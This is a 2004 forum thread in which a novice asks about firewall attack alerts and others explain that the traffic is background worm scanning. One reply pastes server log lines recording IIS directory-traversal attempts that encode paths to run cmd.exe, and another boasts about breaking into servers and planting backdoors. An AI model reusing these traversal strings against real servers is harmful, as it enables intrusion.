Go Back   FormKaos: Board > General Discussion > Coffee Lounge
FAQ Community Arcade Today's Posts Search

Coffee Lounge Talk amongst other community members.

Reply
 
LinkBack Topic Tools Rate Topic
  #1 (permalink)  
Old Mar 09, 04
Elephant Shoe!
 
Join Date: Feb 2004
Newbie4life is an unknown quantity at this point
Hackers?...

i have PC-cillin running with a firewall, and it tells me that i have had attacks... but the scary thing is, everytime i check the (Time of last attack) it changes every damn minute to the most recent.

Last attack: NetBIOS Browsing
Source of last attack: 24.83.169.80 <---- that changes quite frequently----


can someone tell me if the can hack thru the firewall and what are they exactly trying to do... well not exactly but why do hackers try to get into other ppls computers :finger:
Reply With Quote
  #2 (permalink)  
Old Mar 09, 04
Tux Tux is offline
dirty treeplanter
 
Join Date: Apr 2003
Tux is an unknown quantity at this point
welcome to the internet!
most likely 99% of those "attacks" you are seeing are not "hackers" as you think they are.. just harmless "internet background noise" as i like to call it.. this can be the result of servers responding to data requests from your computer, improperly terminated sessions from various websites, random pinging from various places, or responses to various internet enabled applications on your computer. requests for NetBIOS info may be someone scanning a block of ip addresses looking for open shares etc. on computers, so not directly targeting you (unless you're stupid and have open shares). i used to do this myself, just for fun. so don't worry, even though most/all software personal firewalls offer false senses of security and can be bypassed completely or forced to crash (via packet flooding, etc.) and allow someone who knows what they're doing like me to access your computer if they are really determined to get in. But really most of us that know how go for bigger stuff, not individual personal computers that have no real use to get into.. i would rather break into a server, and setup a backdoor and an anonymous ftp or something useful like that..

ps: your name really does suit you.
Reply With Quote
  #3 (permalink)  
Old Mar 09, 04
Elephant Shoe!
 
Join Date: Feb 2004
Newbie4life is an unknown quantity at this point
oh and whats a good anti virus program?... is pc-cillin good enough? or should i get norton


hahaha... i am a noob and always will be :kimmie:


and thnx for the info^

Last edited by Newbie4life; Mar 09, 04 at 12:31 PM.
Reply With Quote
  #4 (permalink)  
Old Mar 09, 04
....fucking evol
 
Join Date: Feb 2004
neoh will become famous soon enough
Hackers don't really give a shit about half-wit computer users, we usualy look for major corporate networks with porn stashed in the head engineer's /home dir. heh. But seriously though, there's lots of worms going around. Nimda, which tries to access open shares (which is accessable through port 139/135UDP - Netbios.)

That's probably what's nailing you.
For instance, here's an example of the last days port 80 (WWW) logs:

root@niobe..[/var/log/apache]# cat access.log|grep 08/Mar|wc -l
20

See, 20 attempts today.

24.2.209.70 - - [08/Mar/2004:20:02:38 -0800] "GET /_mem_bin/..%255c../..%255c../
..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 317 "-" "-"
24.2.209.70 - - [08/Mar/2004:20:02:38 -0800] "GET /msadc/..%255c../..%255c../..%
255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 40
4 333 "-" "-"
24.2.209.70 - - [08/Mar/2004:20:02:39 -0800] "GET /scripts/..%c1%1c../winnt/syst
em32/cmd.exe?/c+dir HTTP/1.0" 404 299 "-" "-"
24.2.209.70 - - [08/Mar/2004:20:02:39 -0800] "GET /scripts/..%c0%2f../winnt/syst
em32/cmd.exe?/c+dir HTTP/1.0" 404 299 "-" "-"
24.2.209.70 - - [08/Mar/2004:20:02:39 -0800] "GET /scripts/..%c0%af../winnt/syst
em32/cmd.exe?/c+dir HTTP/1.0" 404 299 "-" "-"
24.2.209.70 - - [08/Mar/2004:20:02:40 -0800] "GET /scripts/..%c1%9c../winnt/syst
em32/cmd.exe?/c+dir HTTP/1.0" 404 299 "-" "-"
24.2.209.70 - - [08/Mar/2004:20:02:40 -0800] "GET /scripts/..%%35%63../winnt/sys
tem32/cmd.exe?/c+dir HTTP/1.0" 400 283 "-" "-"
24.2.209.70 - - [08/Mar/2004:20:02:40 -0800] "GET /scripts/..%%35c../winnt/syste
m32/cmd.exe?/c+dir HTTP/1.0" 400 283 "-" "-"
24.2.209.70 - - [08/Mar/2004:20:02:41 -0800] "GET /scripts/..%25%35%63../winnt/s
ystem32/cmd.exe?/c+dir HTTP/1.0" 404 300 "-" "-"
24.2.209.70 - - [08/Mar/2004:20:02:41 -0800] "GET /scripts/..%252f../winnt/syste
m32/cmd.exe?/c+dir HTTP/1.0" 404 300 "-" "-"

There's a lot of worms/scanners out there. They'll just scan a c-class of IP's and scan for everything. Open shares/IIS exploits, etc.

Don't worry about it, buddy.

If you run XP, just run the XP's built-in firewall. It's actually pretty good considering, don't pay for that PC-Cillin, etc.. bullshit, waste of money.

- neoh
Reply With Quote
  #5 (permalink)  
Old Mar 09, 04
hosehead
 
Join Date: Jun 2001
inkster is an unknown quantity at this point
http://www.robertgraham.com/pubs/firewall-seen.html

a little complex, but possibly the most valueable bit of information about one's computer is how to interpret firewall logs. this site is probably the most thorough of any i've seen to explain things like this.
Reply With Quote
  #6 (permalink)  
Old Mar 09, 04
DONT BE BITTER BE BETTER
 
Join Date: Apr 2001
rawb is a name known to allrawb is a name known to allrawb is a name known to allrawb is a name known to allrawb is a name known to allrawb is a name known to allrawb is a name known to allrawb is a name known to allrawb is a name known to allrawb is a name known to allrawb is a name known to all
never trust anti virus or firewall alerts.

both programs rationalize themself by talking really loudly about minor things.
Reply With Quote
Reply


Posting Rules
You may not post new threads
You may not post replies
You may not post attachments
You may not edit your posts

BB code is On
Smilies are On
[IMG] code is On
HTML code is Off
Trackbacks are On
Pingbacks are On
Refbacks are On

Forum Jump


All times are GMT -7. The time now is 06:05 PM.


Forum software by vBulletin
Circa 2000 FNK.CA